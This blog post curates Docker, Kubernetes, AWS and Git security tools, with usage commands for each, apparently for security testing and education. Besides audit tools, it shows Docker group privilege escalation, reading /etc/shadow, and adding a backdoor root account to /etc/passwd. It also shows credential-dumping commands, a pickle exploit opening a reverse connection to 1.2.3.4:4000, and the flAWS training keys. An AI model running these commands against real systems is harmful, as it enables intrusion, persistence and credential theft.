| Follow @lancinimarco

Reading time ~7 minutes

My Arsenal of Cloud Native (Security) Tools

A while ago I posted “So I Heard You Want to Learn Kubernetes”, where I tried to demystify the perception by which Kubernetes is believed to be too hard to even get started, by walking through the journey I undertook to get the basics first, and to focus on its security aspects later.

The natural evolution was to put into practice those concepts, but I quickly realized there was a shortage of resources that gave a comprehensive overview of (offensive) security tooling for that space. As with many topics in this industry, information is often scattered and non-uniform.

@ToniBlyx, in his post “My arsenal of AWS security tools”, gave it a go. That post was indeed the starting point for this one, but I felt the need to personalize that list and to add tools not only for AWS, but also for Docker, Kubernetes, and even Git.

In this post I’ll focus on providing a curated list of tools I personally find useful, alongside a quick “usage” guide for each one of them. I’ve also released an Ansible role for those who want to quickly deploy them.

An Ansible role for (some of) the tools listed in this article can be found on Github: https://github.com/marco-lancini/offensive-infrastructure.


Docker

Auditing Tools

Name Description
Docker Bench Checks for common best-practices around deploying Docker containers in production. Based on the CIS Docker Community Edition Benchmark v1.1.0.
docker run -it --net host --pid host --userns host \
    --cap-add audit_control                        \
    -e DOCKER_CONTENT_TRUST=$DOCKER_CONTENT_TRUST  \
    -v /var/lib:/var/lib                           \
    -v /var/run/docker.sock:/var/run/docker.sock   \
    -v /usr/lib/systemd:/usr/lib/systemd           \
    -v /etc:/etc --label docker_bench_security     \
    docker/docker-bench-security
Clair Scan Docker images for security vulnerabilities (static analysis).
I personally found it not straightforward to setup, so I ended up creating my own docker-compose to spin up Clair, alongside Postgres and Klar. For usage, see my docker_compose_clair repo.
Dockscan Scan Docker installations for security issues and vulnerabilities.
# Scan local Docker installation
dockscan unix:///var/run/docker.sock
# Scan remote Docker installation and produce HTML report
dockscan -r html -o myreport -v tcp://example.com:5422

Privilege Escalation

Name Description
dockerrootplease Gives you root on the host OS, if you're a member of the "docker" group
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
docker-rootshell Abuses membership in the "docker" group to drop a root shell in the current working directory.
docker-escalate Same concept as above.
Manual
# Read file
docker run -v /etc/shadow:/docker/hashedpasswords -d postgres

# Manually privesc (if part of docker group) 
# by adding a backdoor toor:password
docker run -it --rm -v $PWD:/mnt bash 
$ echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUk
    acRCvfxC0:0:0:root:/root:/bin/sh' 
    >> /mnt/etc/passwd



Kubernetes

Auditing Tools

Name Description
kube-bench Checks whether Kubernetes is deployed according to security best practices. Based on the CIS Kubernetes Benchmark.
# run inside a container
docker run --rm --pid=host                      \
   -v $(which kubectl):/usr/bin/kubectl         \
   -t aquasec/kube-bench:latest <master|node>

# run in a cluster - on master node
kubectl run                                          \
    --rm                                             \
    -it                                              \
    kube-bench-master                                \
    --image=aquasec/kube-bench:latest                \
    --restart=Never                                  \
    --overrides="{ \"apiVersion\": \"v1\",           \
        \"spec\": { \"hostPID\": true,               \
        \"nodeSelector\":                            \
        { \"kubernetes.io/role\": \"master\" },      \
        \"tolerations\": [ {                         \
        \"key\": \"node-role.kubernetes.io/master\", \
        \"operator\": \"Exists\",                    \
        \"effect\": \"NoSchedule\" }]}}"             \
    -- master                                        \
    --version 1.8

# run in a cluster - on worker nodes
kubectl run                                \
    --rm                                   \
    -it                                    \
    kube-bench-node                        \
    --image=aquasec/kube-bench:latest      \
    --restart=Never                        \
    --overrides="{ \"apiVersion\": \"v1\", \
        \"spec\": { \"hostPID\": true } }" \
    -- node                                \
    --version 1.8
kube-hunter Hunt for security weaknesses in Kubernetes clusters (even remote).
# run from docker
docker run -it --rm --network host aquasec/kube-hunter

# run from kubectl
kubectl run --rm -it                        \
     kube-hunter                            \
     --image=aquasec/kube-hunter            \
     --restart=Never                        \
     --overrides="{ \"apiVersion\": \"v1\", \
     \"spec\": { \"hostNetwork\": true } }"
kube-auto-analyzer Configuration analyzer to automate the process of reviewing Kubernetes installations against the CIS Kubernetes Benchmark.
# Put the config file in a directory and mount it to /data
docker run --rm            
    -v /data:/data raesene/kube_auto_analyzer            
    -c /data/admin.conf -r testdock
    
# Provide a KUBECONFIG file to identify and authenticate the session
kubeautoanalyzer -c <kubeconfig_file_name> -r <report_name> --html



AWS

Basic Tools

Name Description
aws-cli Universal Command Line Interface for AWS, used by basically any other tool.
aws configure --profile <profile_name>
aws-shell Interactive shell for AWS (with autocompletion, etc.).

Inventory Tools

Name Description
aws-inventory Make an inventory of all your resources across regions.
$ python aws_inventory.py
# Select the generated JSON file when prompted
$ firefox gui/dist/index.html
Resource Counter Counts number of resources in categories across regions.
$ python count_resources.py
aws_public_ips Fetch all public IP addresses tied to your AWS account.
# Uses default ~/.aws/credentials
$ aws_public_ips -f json -s apigateway,cloudfront,ec2, \
    elasticsearch,elb,elbv2,lightsail,rds,redshift
# With a custom profile
$ AWS_PROFILE=production aws_public_ips ...

Auditing Tools

Name Description
CS-Suite Auditing the security posture of AWS/GCP/Azure infrastructure. Includes Scout2, Prowler, AWS Trusted Advisor, etc.
Permissions required: SecurityAudit
 $ python cs.py -env aws
CloudSploit Returns a series of potential misconfigurations and security risks.
Permissions required: SecurityAudit
# Edit the index.js file with your AWS key and secret
# Run a standard scan
$ node index.js
# Run a compliance scan
$ node index.js --compliance=hipaa
AWS Security Benchmark Script to evaluate your AWS account against the full CIS Amazon Web Services Foundations Benchmark 1.1.
$ python aws-cis-foundation-benchmark-checklist.py
S3Scan Generate a report of all S3 buckets and their permissions (authenticated).
$ python s3scan.py [-f <format>] [-p <profile>]
CloudMapper Analyze AWS environments by creating network diagrams (and more).
Permissions required: ReadOnlyAccess, SecurityAudit
# Configuration
# Edit it to include your account ID and name (ex. "prod"), 
# along with any external CIDR names
$ cp config.json.demo config.json 

# Collect data & show network diagram
$ python cloudmapper.py collect --account my_account
$ python cloudmapper.py prepare --account my_account
$ python cloudmapper.py webserver

# Find public APIs/hosts/port ranges
$ python cloudmapper.py api_endpoints
$ python cloudmapper.py public

# Audit (check for potential misconfigurations)
$ python cloudmapper.py audit
$ python cloudmapper.py find_admins
PMapper Advanced and Automated AWS IAM Evaluation.
Permissions required: ReadOnlyAccess
§ Usage
# Gather & visualize data
$ python pmapper.py --profile my_profile graph
$ python pmapper.py visualize

# Query if 1+ principals can do a given action with a given resource
# Supported queries:
#     "can <Principal> do <Action> [with <Resource>]"
#     "who can do <Action> [with <Resource>]"
#     "preset <preset_query_name> <preset_query_args>"
$ python pmapper.py --profile my_profile    \
    query  "who can do s3:GetObject with *"

# Presets
#      priv_esc = identifies all principals that can change 
#                  their own permissions (admins) & any
#                  principals that can access the administrative 
#                  principals
#      connected = identifies if one principal can access another, 
#                  or list all principals that can be accessed
$ python pmapper.py --profile my_profile    \
    query "preset priv_esc user/PowerUser"
Scout2 Security auditing. Already included in CS-Suite.
Permissions required: ReadOnlyAccess, SecurityAudit
$ Scout2 --profile <PROFILE_NAME>
Prowler CIS benchmarks and additional checks for security best practices in AWS. Already included in CS-Suite.
Permissions required: SecurityAudit
$ ./prowler -p PROFILE -r us-east-1 | ansi2html -la > report.html

Offensive Tools

Name Description
Pacu AWS penetration testing toolkit, designed for offensive security testing against cloud environments. Current modules enable a range of attacks, including user privilege escalation, backdooring of IAM users, attacking vulnerable Lambda functions, etc.
# Import keys
pacu> import_keys <profile>
# Modules
https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details
Nimbostratus Tools for fingerprinting and exploiting Amazon cloud infrastructures.
# Dump credentials available in this host
$ nimbostratus dump-credentials

# Dump permissions for the provided credentials
$ nimbostratus dump-permissions --access-key=<ACCESS-KEY> \
    --secret-key=<SECRET>

# Dump instance metadata for the instance where the command is run
$ nimbostratus dump-ec2-metadata

# Create DB snapshot
#    If you've got credentials which allow you to 
#          access the RDS API but don't have any 
#          access to the database itself (MySQL user)
#    This allows to access the information stored 
#          in that database by creating
#          a snapshot and restoring it
$ nimbostratus snapshot-rds --access-key=ACCESS \
        --secret-key=SECRET                     \
        --password PASSWORD --rds-name NAME     \
        --region ap-southeast-1

# Inject raw Celery message
$ nimbostratus celery-pickle-exploit --access-key=ACCESS \
        --secret-key=SECRET                              \
        --reverse 1.2.3.4:4000 --queue-name NAME

# Create new user
$ nimbostratus create-iam-user --access-key=ACCESS \
        --secret-key=SECRET
weirdALL AWS Attack Library.
# Set an AWS key pair
$ cat env.sample
        [default]
        aws_access_key_id = <insert key id>
        aws_secret_access_key = <insert secret key>
$ cp env.sample .env

# Setup the database
$ python3 create_dbs.py

# Run the recon module
$ python3 weirdAAL.py -m recon_all -t MyTarget

# Other modules
https://github.com/carnal0wnage/weirdAAL/wiki
S3Scanner Scan for open AWS S3 buckets and dump the contents.
$ cat names.txt
    flaws.cloud
    google-dev
    testing.microsoft.com
    yelp-production.s3-us-west-1.amazonaws.com
    github-dev:us-east-1
    
# Dump all open buckets
$ python s3scanner.py --include-closed  \
    --out-file found.txt --dump names.txt

# Save file listings of all open buckets to file
$ python s3scanner.py --list names.txt
Cloudjack CloudJack assesses AWS accounts for subdomain hijacking vulnerabilities as a result of decoupled Route53 and CloudFront configurations.
$ python cloudjack.py -o json -p default
AWS PWN A collection of AWS penetration testing scripts:
  • Reconnaissance
  • Exploration
  • Elevation
  • Persistence

Training Apps

Name Description
flAWS Challenge that, through a series of levels, teaches common mistakes and gotchas when using AWS. It also has some "public" credentials you can use to try your tools against:
Access key ID: AKIAJFQ6E7BY57Q3OBGA
Secret: S2IpymMBlViDlqcAnFuZfkVjXrYxZYhP+dZ4ps+u
Cloudgoat Vulnerable by Design AWS infrastructure setup tool. There are also some writeups available.
DVCA Damn Vulnerable Cloud Application.
nimbostratus-target This repository holds a target infrastructure you can use for testing nimbostratus.



GIT

Name Description
git-secrets Prevents you from committing secrets and credentials into git repositories.
Gitrob Reconnaissance tool for GitHub organizations.
$ export GITROB_ACCESS_TOKEN=<TOKEN>
$ gitrob <TARGET>
Gitleaks Searches full repo history for secrets and keys.
TruffleHog Searches through git repositories for high entropy strings and secrets.

Marco Lancini

Marco Lancini
Hi, I'm Marco Lancini. I'm a Security Engineer, previously Security Consultant, mainly interested in: cloud, devops, netsec, appsec...  

Hunt for and Exploit the libSSH Authentication Bypass (CVE-2018-10933)

Practical Guide explaining how to find hosts vulnerable to the libSSH Authentication Bypass (CVE-2018-10933) and how to exploit them to gain shell access. Continue reading

So I Heard You Want to Learn Kubernetes

Published on September 26, 2018

GoScan v2

Published on September 03, 2018